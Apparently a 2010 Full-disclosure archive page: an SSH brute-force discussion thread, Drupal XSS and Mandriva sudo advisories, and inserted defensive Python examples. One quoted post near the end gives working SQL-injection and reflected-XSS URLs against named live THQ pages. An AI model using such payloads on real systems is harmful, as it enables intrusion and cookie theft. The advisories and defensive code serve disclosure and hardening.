> once an hour with attacking IPs, and obviously also download the
> public hosts.deny list.
>
> These machines get hit regularly, so often that I don't really
> care, it's fun to make the script kiddies waste their time! But in
> this instance, only my home box is being attacked... someone is
> burning a lot of cycles and hosts to do a distributed dictionary
> attack on my one box! The named daemon is non recursive, properly
> configured, up to date and not being attacked.
>
> Is anyone else seeing this type of attack? Or is someone really
> targeting MY box?
>
> Thanks
>
>
> Gary Baribault Courriel: g...@baribault.net GPG Key: 0x685430d1
> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
>
>


Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Gary Baribault
My Denyhosts daemon is configured pretty much like that, but it uses
TCP Wrapper (hosts.deny) instead of the firewall and it uploads the
attacking IPs to a central server every hour for other Denyhosts users.

Gary Baribault
Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1

On 06/17/2010 08:32 AM, Gregory Bellier wrote:
> Hi !
>
> Most of the time (to not say everytime), it's a bot and not a human
> behind those attacks.
> I configured my firewall to ban for a minute every IPs trying to log
> in with 5 wrong attempts.
> Once it's banned, the bot tries one or two more times and then give up.
>
> It's pretty much effective.
>
> 
>
> 2010/6/17 Gary Baribault  >
>
> Hello list,
>
>I have a strange situation and would like information from the
> list members. I have three Linux boxes exposed to the Internet.
> Two of
> them are on cable modems, and both have two services that are
> publicly
> available. In both cases, I have SSH and named running and available
> to the public. Before you folks say it, yes I run SSH on TCP/22
> and no
> I don't want to move it to another port, and no I don't want to
> restrict it to certain source IPs.
>
>Both of these systems are within one /21 and get attacked
> regularly. I run Denyhosts on them, and update the central
> server once
> an hour with attacking IPs, and obviously also download the public
> hosts.deny list.
>
>These machines get hit regularly, so often that I don't really
> care, it's fun to make the script kiddies waste their time! But in
> this instance, only my home box is being attacked... someone is
> burning a lot of cycles and hosts to do a distributed dictionary
> attack on my one box! The named daemon is non recursive, properly
> configured, up to date and not being attacked.
>
>Is anyone else seeing this type of attack? Or is someone really
> targeting MY box?
>
> Thanks
>
>
> Gary Baribault
> Courriel: g...@baribault.net 
> GPG Key: 0x685430d1
> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
>
>
>

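The threshold ban that Gregory Bellier describes in the quoted reply above (five failures, one-minute ban) and that Gary says Denyhosts implements through hosts.deny, replayed over sshd log lines as an added example; this is not code from anyone in the thread or from Denyhosts. The auth.log lines are constructed (the addresses are documentation ranges), the year is supplied by the caller because syslog timestamps carry none, and the defaults mirror the numbers in the quoted reply. The replay treats an attempt that arrives during a ban as dropped by the firewall rather than counting it. One caveat the thread itself supplies: a distributed dictionary attack spreads attempts over many hosts, so a per-IP threshold like this one catches the single-source bots and not much else, which is why the advice to move to key-based authentication stands.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List, NamedTuple, Tuple

# Constructed OpenSSH log lines in /var/log/auth.log format (not a real capture).
SAMPLE_AUTH_LOG = """\
Jun 17 07:40:01 home sshd[2101]: Failed password for invalid user admin from 203.0.113.7 port 51122 ssh2
Jun 17 07:40:03 home sshd[2103]: Failed password for invalid user oracle from 203.0.113.7 port 51130 ssh2
Jun 17 07:40:05 home sshd[2105]: Failed password for root from 203.0.113.7 port 51141 ssh2
Jun 17 07:40:06 home sshd[2107]: Failed password for invalid user test from 203.0.113.7 port 51150 ssh2
Jun 17 07:40:08 home sshd[2109]: Failed password for invalid user guest from 203.0.113.7 port 51162 ssh2
Jun 17 07:40:09 home sshd[2111]: Failed password for invalid user admin from 203.0.113.7 port 51170 ssh2
Jun 17 07:41:15 home sshd[2120]: Failed password for gary from 198.51.100.23 port 40022 ssh2
Jun 17 07:41:20 home sshd[2122]: Accepted password for gary from 198.51.100.23 port 40022 ssh2
Jun 17 07:45:30 home sshd[2130]: Failed password for invalid user admin from 203.0.113.7 port 51200 ssh2
"""

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


class Ban(NamedTuple):
    ip: str
    start: datetime
    end: datetime


def _parse_ts(ts: str, year: int) -> datetime:
    # syslog timestamps carry no year; the caller supplies it (assumption).
    return datetime.strptime(ts, "%b %d %H:%M:%S").replace(year=year)


def replay_bans(log_text: str, threshold: int = 5, window_s: int = 60,
                ban_s: int = 60, year: int = 2010) -> Tuple[List[Ban], int]:
    """Replay sshd failures and return (bans issued, attempts dropped while banned).

    An IP that accumulates `threshold` failures inside a sliding window of
    `window_s` seconds is banned for `ban_s` seconds.  Attempts that arrive
    during a ban would be dropped by the firewall, so they are counted in the
    second return value and not held against the IP.
    """
    window = timedelta(seconds=window_s)
    failures: Dict[str, Deque[datetime]] = defaultdict(deque)
    banned_until: Dict[str, datetime] = {}
    bans: List[Ban] = []
    dropped = 0
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue                      # accepted logins and other noise
        ip, t = m.group("ip"), _parse_ts(m.group("ts"), year)
        if ip in banned_until and t < banned_until[ip]:
            dropped += 1
            continue
        q = failures[ip]
        q.append(t)
        while q and t - q[0] > window:    # forget failures outside the window
            q.popleft()
        if len(q) >= threshold:
            end = t + timedelta(seconds=ban_s)
            bans.append(Ban(ip, t, end))
            banned_until[ip] = end
            q.clear()                     # start counting afresh after the ban
    return bans, dropped


if __name__ == "__main__":
    issued, dropped = replay_bans(SAMPLE_AUTH_LOG)
    for b in issued:
        print(f"ban {b.ip} from {b.start:%H:%M:%S} until {b.end:%H:%M:%S}")
    print(f"{dropped} attempt(s) would have been dropped by the firewall")
```

On the sample, the first source trips the threshold at its fifth failure, its sixth attempt falls inside the ban, and its return five minutes later starts a fresh count; the single failure from the legitimate user never comes near the limit.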

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Gary Baribault
Did you ever figure out if YOU were targeted or if someone just liked
your box? In my case I have two servers within one IP block for the
cable modem provider, and in the past BOTH boxes were always attacked
together, which indicated that it was probably the entire ISP that was
targeted. In this case it's only one of my boxes.

I'm not particularly worried, root is not allowed, and on that box
there is only one valid UID that's allowed SSH access.

Gary Baribault
Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1


On 06/17/2010 08:37 AM, Adam Richards wrote:
> I had an attacker go after one of my FreeBSD machines for almost two
> months straight. I wrote my own denyhost (like) script and banned his
> IP's constantly, but it didn't stop until he ran out of proxies I guess.
> Either that or it was busy season for my ip block.
>
>
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk
> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Gary
> Baribault
> Sent: Thursday, June 17, 2010 6:48 AM
> To: full-disclosure@lists.grok.org.uk
> Subject: [Full-disclosure] targetted SSH bruteforce attacks
>
> Hello list,
>
> I have a strange situation and would like information from the
> list members. I have three Linux boxes exposed to the Internet. Two of
> them are on cable modems, and both have two services that are publicly
> available. In both cases, I have SSH and named running and available
> to the public. Before you folks say it, yes I run SSH on TCP/22 and no
> I don't want to move it to another port, and no I don't want to
> restrict it to certain source IPs.
>
> Both of these systems are within one /21 and get attacked
> regularly. I run Denyhosts on them, and update the central server once
> an hour with attacking IPs, and obviously also download the public
> hosts.deny list.
>
> These machines get hit regularly, so often that I don't really
> care, it's fun to make the script kiddies waste their time! But in
> this instance, only my home box is being attacked... someone is
> burning a lot of cycles and hosts to do a distributed dictionary
> attack on my one box! The named daemon is non recursive, properly
> configured, up to date and not being attacked.
>
> Is anyone else seeing this type of attack? Or is someone really
> targeting MY box?
>
> Thanks
>
>
> Gary Baribault
> Courriel: g...@baribault.net
> GPG Key: 0x685430d1
> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
>
>


Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Emmanuel VERCHERE
Hi Gary,

SSH daemons using password auth exposed to the Internet _do_ get
bruteforce attempts. I would not recommend moving it to a different port
than 22 as that would be of very, _very_ little help - rather switch to
public key auth (plus SPA if you're paranoid), et voila.
I don't think there's someone out there craving for _your_ box - but
scripts running from compromised hosts, scanning for password-protected
SSH daemons (as well as a bunch of known exploitable webapps and
services), trying to reach out for 'fresh meat', and as such expand the
zombie net? Definitely ;)

Cheers.
 


On Thu, 17 Jun 2010 07:48:18 -0400
Gary Baribault  wrote:

> Hello list,
> 
> I have a strange situation and would like information from the
> list members. I have three Linux boxes exposed to the Internet. Two of
> them are on cable modems, and both have two services that are publicly
> available. In both cases, I have SSH and named running and available
> to the public. Before you folks say it, yes I run SSH on TCP/22 and no
> I don't want to move it to another port, and no I don't want to
> restrict it to certain source IPs.
> 
> Both of these systems are within one /21 and get attacked
> regularly. I run Denyhosts on them, and update the central server once
> an hour with attacking IPs, and obviously also download the public
> hosts.deny list.
> 
> These machines get hit regularly, so often that I don't really
> care, it's fun to make the script kiddies waste their time! But in
> this instance, only my home box is being attacked... someone is
> burning a lot of cycles and hosts to do a distributed dictionary
> attack on my one box! The named daemon is non recursive, properly
> configured, up to date and not being attacked.
> 
> Is anyone else seeing this type of attack? Or is someone really
> targeting MY box?
> 
> Thanks
> 
> 
> Gary Baribault
> Courriel: g...@baribault.net
> GPG Key: 0x685430d1
> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
> 


-- 
__
 Emmanuel VERCHERE
everchere  everchere  com
   http://everchere.com/emmanuel.verchere.asc
   CF41 68A4 5C7F 6598 8F08  D04D BD55 EBD1 71E1 1339



Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Gary Baribault
Thanks Emmanuel,

I have to access that box sometimes from other machines than my
own, so I would have to have my key and install it on all kinds of
Windows boxen .. I have extremely good passwords that I change every
30 days, or every time I use a machine that I'm not 100% sure of.

Gary Baribault

Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1


On 06/17/2010 08:45 AM, Emmanuel VERCHERE wrote:
> Hi Gary,
>
> SSH daemons using password auth exposed to the Internet _do_ get
> bruteforce attempts. I would not recommend moving it to a different port
> than 22 as that would be of very, _very_ little help - rather switch to
> public key auth (plus SPA if you're paranoid), et voila.
> I don't think there's someone out there craving for _your_ box - but
> scripts running from compromised hosts, scanning for password-protected
> SSH daemons (as well as a bunch of known exploitable webapps and
> services), trying to reach out for 'fresh meat', and as such expand the
> zombie net? Definitely ;)
>
> Cheers.
> 
>
>
> On Thu, 17 Jun 2010 07:48:18 -0400
> Gary Baribault  wrote:
>
>> Hello list,
>>
>> I have a strange situation and would like information from the
>> list members. I have three Linux boxes exposed to the Internet. Two of
>> them are on cable modems, and both have two services that are publicly
>> available. In both cases, I have SSH and named running and available
>> to the public. Before you folks say it, yes I run SSH on TCP/22 and no
>> I don't want to move it to another port, and no I don't want to
>> restrict it to certain source IPs.
>>
>> Both of these systems are within one /21 and get attacked
>> regularly. I run Denyhosts on them, and update the central server once
>> an hour with attacking IPs, and obviously also download the public
>> hosts.deny list.
>>
>> These machines get hit regularly, so often that I don't really
>> care, it's fun to make the script kiddies waste their time! But in
>> this instance, only my home box is being attacked... someone is
>> burning a lot of cycles and hosts to do a distributed dictionary
>> attack on my one box! The named daemon is non recursive, properly
>> configured, up to date and not being attacked.
>>
>> Is anyone else seeing this type of attack? Or is someone really
>> targeting MY box?
>>
>> Thanks
>>
>>
>> Gary Baribault
>> Courriel: g...@baribault.net
>> GPG Key: 0x685430d1
>> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
>>
>
>


Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Adam Richards
I had an attacker go after one of my FreeBSD machines for almost two
months straight. I wrote my own denyhost (like) script and banned his
IPs constantly, but it didn't stop until he ran out of proxies I guess.
Either that or it was busy season for my IP block.



-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Gary
Baribault
Sent: Thursday, June 17, 2010 6:48 AM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] targetted SSH bruteforce attacks

Hello list,

I have a strange situation and would like information from the
list members. I have three Linux boxes exposed to the Internet. Two of
them are on cable modems, and both have two services that are publicly
available. In both cases, I have SSH and named running and available
to the public. Before you folks say it, yes I run SSH on TCP/22 and no
I don't want to move it to another port, and no I don't want to
restrict it to certain source IPs.

Both of these systems are within one /21 and get attacked
regularly. I run Denyhosts on them, and update the central server once
an hour with attacking IPs, and obviously also download the public
hosts.deny list.

These machines get hit regularly, so often that I don't really
care, it's fun to make the script kiddies waste their time! But in
this instance, only my home box is being attacked... someone is
burning a lot of cycles and hosts to do a distributed dictionary
attack on my one box! The named daemon is non recursive, properly
configured, up to date and not being attacked.

Is anyone else seeing this type of attack? Or is someone really
targeting MY box?

Thanks


Gary Baribault
Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1



[Full-disclosure] Drupal FileField Module XSS Vulnerability

2010-06-17 Thread Justin C. Klein Keane
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

FileField 6.x-3.3 Arbitrary Script Injection Vulnerability

CVE-2010-1958

Description of Vulnerability:
- -
Drupal (http://drupal.org) is a robust content management system (CMS)
written in PHP and MySQL.  The Drupal FileField module
(http://drupal.org/project/filefield) "provides a universal file upload
field for CCK. It is a robust alternative to core's Upload module and an
absolute must for users uploading a large number of files. Great for
managing video and audio files for podcasts on your own site."  The
FileField module contains a cross site scripting (XSS) vulnerability due
to the fact that it fails to sanitize image filenames before display.

Systems affected:
- -
Drupal 6.16 with CCK 6.x-2.6 and FileField 6.x-3.3 was tested and shown
to be vulnerable.

Impact
- --
Users who have rights to create content may upload files (including
images) with malicious names that could result in script execution.
This could result in administrative account compromise leading to web
server process compromise.

Mitigating factors:
- ---
Attacker must have rights to create content of a type that employs a
FileField CCK element.  This would include most content that has
attachments, including imagery, documents, etc.

Additionally, Drupal's file handling must be set to Public in the File
system settings at ?q=admin/settings/file-system.  This is the default
configuration.

Further Details:
- 
Further details about this vulnerability can be found at
http://www.madirish.net/?article=461

Vendor Response:
- --
Vendor has responded by releasing a fixed version and a detailed
security announcement.  Vendor response is fully detailed in
SA-CONTRIB-2010-066 (http://drupal.org/node/829808)

- -- 
Justin C. Klein Keane
http://www.MadIrish.net

The digital signature on this message can be confirmed
using the public key at http://www.madirish.net/gpgkey
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org/

iPwEAQECAAYFAkwaHF0ACgkQkSlsbLsN1gC1Nwb+PFlE/a/PtZJdjnI3IO18FzaV
nZkEfBlngdsHZLW+G9qoaXyORZ781uIkRtQJMEQBEKBFWAYfPAuvAk2eq7xxhoZl
X8zrKtJYb7gkWZO+7iBGs0q/ah7FKLCPr578SgMcilCLn7OmjkEFJOqRH0Fb2kVu
beiL3N5vEVI4Qz/qygglMvsFyRm4v22l8SeYKFrs/e7x+NR8puQjVvSeF5dFSQ7x
oqJrdPqD29fO3sfKVR/IqIGwFg+nzLUrvmqT4p7HSsxjbc5IXGRn+MohbRz/RS1C
rzqZI/ytPkuBp2XRqdI=
=EpO+
-END PGP SIGNATURE-



[Full-disclosure] [ MDVSA-2010:118 ] sudo

2010-06-17 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:118
 http://www.mandriva.com/security/
 ___

 Package : sudo
 Date: June 17, 2010
 Affected: 2008.0, 2009.0, 2009.1, 2010.0, Corporate 4.0,
   Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in sudo:
 
 The secure path feature in env.c in sudo 1.3.1 through 1.6.9p22 and
 1.7.0 through 1.7.2p6 does not properly handle an environment that
 contains multiple PATH variables, which might allow local users
 to gain privileges via a crafted value of the last PATH variable
 (CVE-2010-1646).
 
 Packages for 2008.0 and 2009.0 are provided as of the Extended
 Maintenance Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1646
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 3b150466a24f75af8f4bbcc89c1468d2  
2008.0/i586/sudo-1.6.9p5-1.4mdv2008.0.i586.rpm 
 49875dd9c6e6d839a61226b021cf192d  
2008.0/SRPMS/sudo-1.6.9p5-1.4mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 6d110f6c4ff43eff97f057be1706ca13  
2008.0/x86_64/sudo-1.6.9p5-1.4mdv2008.0.x86_64.rpm 
 49875dd9c6e6d839a61226b021cf192d  
2008.0/SRPMS/sudo-1.6.9p5-1.4mdv2008.0.src.rpm

 Mandriva Linux 2009.0:
 02649098037409edb33fd03e1b8b21cd  
2009.0/i586/sudo-1.6.9p17-1.5mdv2009.0.i586.rpm 
 3d0670af695d911acdbb5c5c3b9d342f  
2009.0/SRPMS/sudo-1.6.9p17-1.5mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 6c7c2b55e65b7054bbc3d46e3f55987b  
2009.0/x86_64/sudo-1.6.9p17-1.5mdv2009.0.x86_64.rpm 
 3d0670af695d911acdbb5c5c3b9d342f  
2009.0/SRPMS/sudo-1.6.9p17-1.5mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 e6e4ffb3c60b2aff91eb219c7a0bea00  2009.1/i586/sudo-1.7.0-1.5mdv2009.1.i586.rpm 
 667a2aedf07bfb872959137305a55ce9  2009.1/SRPMS/sudo-1.7.0-1.5mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 a4d32b781c15a3f9d9d125517926d331  
2009.1/x86_64/sudo-1.7.0-1.5mdv2009.1.x86_64.rpm 
 667a2aedf07bfb872959137305a55ce9  2009.1/SRPMS/sudo-1.7.0-1.5mdv2009.1.src.rpm

 Mandriva Linux 2010.0:
 c588b31daa6df95eac1ee60dc7dcf8ac  
2010.0/i586/sudo-1.7.2-0.p1.1.3mdv2010.0.i586.rpm 
 c6be126b2615e18e70078dd293d03de3  
2010.0/SRPMS/sudo-1.7.2-0.p1.1.3mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 8f4941c826a0bd548a61d9da7bb0e73e  
2010.0/x86_64/sudo-1.7.2-0.p1.1.3mdv2010.0.x86_64.rpm 
 c6be126b2615e18e70078dd293d03de3  
2010.0/SRPMS/sudo-1.7.2-0.p1.1.3mdv2010.0.src.rpm

 Corporate 4.0:
 44c695de05087df739f5e6c88478b4a4  
corporate/4.0/i586/sudo-1.6.8p8-2.6.20060mlcs4.i586.rpm 
 11cbff747ced6ba1a7a42b31bafea93c  
corporate/4.0/SRPMS/sudo-1.6.8p8-2.6.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 f4e89034ad77274fb8b1a3d8328a3b28  
corporate/4.0/x86_64/sudo-1.6.8p8-2.6.20060mlcs4.x86_64.rpm 
 11cbff747ced6ba1a7a42b31bafea93c  
corporate/4.0/SRPMS/sudo-1.6.8p8-2.6.20060mlcs4.src.rpm

 Mandriva Enterprise Server 5:
 4f681bc8038255e2847e003a81026c61  
mes5/i586/sudo-1.6.9p17-1.5mdvmes5.1.i586.rpm 
 1eb14f0e7241bd6e5b916775a6673491  mes5/SRPMS/sudo-1.6.9p17-1.5mdvmes5.1.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 60aedd6549ad7cd8f56c534b13f8e5eb  
mes5/x86_64/sudo-1.6.9p17-1.5mdvmes5.1.x86_64.rpm 
 1eb14f0e7241bd6e5b916775a6673491  mes5/SRPMS/sudo-1.6.9p17-1.5mdvmes5.1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFMGe/hmqjQ0CJFipgRAogFAKDZ1mQU10QPHvxinipXR5eqa37wsQCbB95W
v4RrVtM1SUuLg3Ka1ZFva04=
=Ly7f
-END PGP SIGNATURE-

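The advisory's one-line description covers a whole class of sanitizer bug: an environment handed to execve() is just a list of "NAME=value" strings, nothing stops a caller from passing the same NAME twice, and a sanitizer that fixes up the first PATH it finds and stops leaves the other copy untouched. The following Python model is an added illustration of that class, not sudo's code and not a reproduction of the sudo bug; the policy path, the "last copy wins" lookup order (the one the advisory describes) and the crafted environment are assumptions and constructed data.

```python
"""Why a 'fix the first PATH' sanitizer fails when PATH appears twice.

Added example, not sudo's code: an execve() environment is a list of
'NAME=value' strings and may contain NAME more than once.  Which copy a
child program ends up using depends on the program and its libc; the
advisory describes the LAST one mattering.  A sanitizer therefore has to
remove every copy, not patch the first one it sees.
"""

SECURE_PATH = "/usr/local/bin:/usr/bin:/bin"   # assumed policy value


def naive_secure_path(envp):
    """Buggy pattern: rewrite the first PATH entry and stop looking."""
    out = list(envp)
    for i, entry in enumerate(out):
        if entry.startswith("PATH="):
            out[i] = "PATH=" + SECURE_PATH
            break                      # a second PATH= entry survives untouched
    return out


def strict_secure_path(envp):
    """Fixed pattern: drop every PATH entry, however many, then add exactly one."""
    out = [e for e in envp if e.split("=", 1)[0] != "PATH"]
    out.append("PATH=" + SECURE_PATH)
    return out


def effective_path(envp, last_wins=True):
    """The PATH a child would use.  last_wins=True models the behaviour the
    advisory describes; last_wins=False models a first-match lookup."""
    values = [e[len("PATH="):] for e in envp if e.startswith("PATH=")]
    if not values:
        return None
    return values[-1] if last_wins else values[0]


def path_is_trusted(path):
    """Every directory in PATH must come from the policy list."""
    allowed = set(SECURE_PATH.split(":"))
    return all(d in allowed for d in path.split(":"))


# constructed: a caller supplies PATH twice, the second pointing at a
# user-writable directory
CRAFTED_ENV = [
    "USER=alice",
    "PATH=/usr/bin:/bin",
    "HOME=/home/alice",
    "PATH=/tmp/writable:/usr/bin",
]

if __name__ == "__main__":
    for name, fn in (("naive", naive_secure_path), ("strict", strict_secure_path)):
        env = fn(CRAFTED_ENV)
        print(name, effective_path(env), "trusted:", path_is_trusted(effective_path(env)))
```

The point of `effective_path(last_wins=...)` is that the naive sanitizer only looks safe under one lookup order; the strict one yields exactly one PATH entry, so the question of which copy wins never arises.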


Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Valdis . Kletnieks
On Thu, 17 Jun 2010 07:48:18 EDT, Gary Baribault said:

> Both of these systems are within one /21 and get attacked
> regularly. I run Denyhosts on them, and update the central server once
> an hour with attacking IPs, and obviously also download the public
> hosts.deny list.
> 
> These machines get hit regularly, so often that I don't really
> care, it's fun to make the script kiddies waste their time! But in
> this instance, only my home box is being attacked... someone is
> burning a lot of cycles and hosts to do a distributed dictionary
> attack on my one box!

One of two things springs to mind:

1) when they scanned your address space looking for SSH hosts to try to
whack, your one host didn't report as a target for some random reason.

2) they're handling their list of targets in a pseudo-random order.  We've
seen attacking IPs pound on 2 or 3 hosts in our /16 for a few days, then go
away, and 2-3 weeks later return to pound on other targets.

Bottom line: Either they didn't notice your other box, or they'll get around
to poking it in a few weeks...




Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Michael Holstein

> Is anyone else seeing this type of attack? Or is someone really
> targeting MY box?
>
>   

No, I assure you it's not just you.

It's also not uncommon to see a sequential (basically a nmap -p 22) scan
at full throttle several times a day.

You can basically :

a) move to another port (obscurity .. but pretty effective in weeding
out the casual versus committed)
b) switch to public key only auth (recommended anyway if possible).
c) use denyhosts, tarpitting, etc. to frustrate the casual guessers and
bots.

The ones that are committed will find a way around (a) and (c). But it
will take somebody a long time to properly guess a key for (b) .. 
unless you forgot to patch your Debian SSHd from their little snafu ..
but you'd have been owned long ago if that was the case.

If you really must use passwords on a multi-user system listening on
tcp/22, then employ something like the PAM modules for JTR
(pam_passwdqc) just to make sure people don't use stupid ones.

Cheers,

Michael Holstein
Cleveland State University

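Options (b) and (c) above are decided in sshd_config, and the way sshd resolves that file trips people up: keywords are case-insensitive, the first occurrence of a keyword wins (a later duplicate changes nothing), and anything under a Match line applies only to matching clients. The audit below is an added example in Python, not code from the post or from OpenSSH; the threshold for MaxAuthTries and the assumed defaults for absent keywords are my policy choices, and both sample configs are constructed.

```python
"""Audit an sshd_config for the settings that make password guessing possible.

Added example, not from the post or from OpenSSH: it resolves the file the
way sshd(8) does for our purposes (keywords case-insensitive, FIRST occurrence
of a keyword wins) and stops at the first 'Match' line, whose settings are
conditional on the client.  Sample configs are constructed.
"""
import re

MAX_TRIES_ALLOWED = 3                      # assumed policy: few guesses per connection
KEYWORD_RE = re.compile(r"([A-Za-z0-9]+)\s*=?\s*(.*)")   # 'Key value' or 'Key=value'


def parse_sshd_config(text):
    """Return {keyword.lower(): value}, first occurrence wins, up to any Match block."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = KEYWORD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            break                          # everything after this is conditional
        settings.setdefault(key, value)    # a later duplicate never overrides
    return settings


def audit(text):
    """Return [(Keyword, effective value, why it matters)] for weak settings.
    Defaults for absent keywords are those of OpenSSH of the thread's era
    (PermitRootLogin defaulted to 'yes' before OpenSSH 7.0)."""
    cfg = parse_sshd_config(text)

    def effective(key, default):
        return cfg.get(key, default).lower()

    findings = []
    if effective("passwordauthentication", "yes") == "yes":
        findings.append(("PasswordAuthentication", "yes",
                         "dictionary attacks are possible at all; use keys"))
    if effective("pubkeyauthentication", "yes") != "yes":
        findings.append(("PubkeyAuthentication", effective("pubkeyauthentication", "yes"),
                         "key-based login is disabled"))
    if effective("permitrootlogin", "yes") == "yes":
        findings.append(("PermitRootLogin", "yes",
                         "the account every bot tries first is reachable"))
    if effective("permitemptypasswords", "no") == "yes":
        findings.append(("PermitEmptyPasswords", "yes", "empty passwords accepted"))
    try:
        tries = int(effective("maxauthtries", "6"))
    except ValueError:
        tries = None
    if tries is None or tries > MAX_TRIES_ALLOWED:
        findings.append(("MaxAuthTries", effective("maxauthtries", "6"),
                         f"more than {MAX_TRIES_ALLOWED} guesses per connection"))
    return findings


WEAK_CONFIG = """\
# constructed: the kind of sshd_config many distributions shipped at the time
Port 22
Protocol 2
PermitRootLogin yes
PasswordAuthentication yes
# this later line changes nothing: sshd keeps the first value it saw
PasswordAuthentication no
MaxAuthTries 6
"""

HARDENED_CONFIG = """\
# constructed: keys only, no root, few tries; passwords only for one LAN
Port 22
Protocol 2
PermitRootLogin no
PubkeyAuthentication yes
PasswordAuthentication no
PermitEmptyPasswords no
MaxAuthTries 3
Match Address 192.0.2.0/24
    PasswordAuthentication yes
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit(cfg))
```

Run it against `/etc/ssh/sshd_config` by reading the file into `audit()`; the weak sample shows why "I added PasswordAuthentication no at the end" does not work when an earlier line already says yes.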


Re: [Full-disclosure] THQ website has multiple SQL injection bugs, and a reflected XSS

2010-06-17 Thread Benji
rabble rabble rabble rabble rabble rabble rabble rabble rabble rabble
rabble rabble rabble rabble rabble rabble rabble rabble rabble rabble
rabble rabble rabble rabble rabble rabble rabble rabble rabble

On Wed, Jun 16, 2010 at 9:05 PM, Harry Balls  wrote:
> This is pretty much because I want to embarrass these assholes. See:
> http://gamepolitics.com/2010/06/14/exec-thq-anti-used-game-initiative-could-make-everyone-happy
>
> SQLi 1:
> http://www.thq.com/us/mythq/register?contentType=GAMEALERT&alertGame='4896
>
> This one is pretty obvious. It's an injection via $_GET. The funniest part
> is that they don't just allow injection. They serve up the whole PHP source
> of the page for you. Giving you table names, and the actual syntax of the
> query being used.
>
> SQLi 2:
> The next one is an injection via POST in their registration form here:
> http://www.thq.com/us/mythq/register
>
> I used burpsuite to inject it by editing the HTTP requests but you can
> probably just enter whatever you want right in the form. I used the UK
> subdomain for testing: http://uk.thq.com/uk/mythq/register. This one also
> shows the source.
>
> Next one is your typical reflected XSS:
>
> http://www.thq.com/us/search/index?keyw=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
>
> I hope this is enough to put off anyone who was thinking of buying shit from
> them.
> Would you trust this company with your credit card information when they
> can't even properly sanitize a registration form?
> These probably aren't even the only security bugs on their site. This is
> just after 10 minutes of pentesting. Do yourself a favor and stay far far
> away from this company. They have no clue about security and obviously don't
> give a shit about their customers.
>
> BOYCOTT THQ
>
>


Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Benji
What?

Think about what you said.

Anyone. else. seeing. a. targetted. attack.

Why would anyone else see a TARGETTED attack?

anyway, no, you're not special, distributed SSH bruteforce is normal.


On Thu, Jun 17, 2010 at 1:44 PM, Gary Baribault  wrote:
> I just knew that people would say that, and that's why I specified
